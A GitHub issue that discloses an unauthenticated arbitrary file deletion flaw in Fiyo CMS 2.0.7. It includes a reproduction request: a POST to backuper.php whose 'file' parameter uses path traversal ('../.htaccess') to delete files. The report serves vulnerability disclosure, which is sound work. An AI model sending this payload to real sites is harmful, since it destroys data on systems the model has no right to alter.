Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

A any file delete vulnerability #2

Open
jgj212 opened this issue Apr 17, 2017 · 1 comment
Open

A any file delete vulnerability #2

jgj212 opened this issue Apr 17, 2017 · 1 comment

Comments

@jgj212
Copy link

jgj212 commented Apr 17, 2017

I found that Fiyo CMS version 2.0.7 has a any file delete vulnerability that do not need login.

1

There is not any checking about the $_POST['act'] $_POST[file] , client can control these two input to cause any file deletion .

reproduce(this will delete .htaccess file):
Url: http://localhost /dapur/apps/app_config/controller/backuper.php
POST: type=delete&act=db&file=../.htaccess
Referrer: http://localhost

Discoverer: ADLab of VenusTech.

@firstryan
Copy link
Contributor

firstryan commented Jul 18, 2017 via email

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants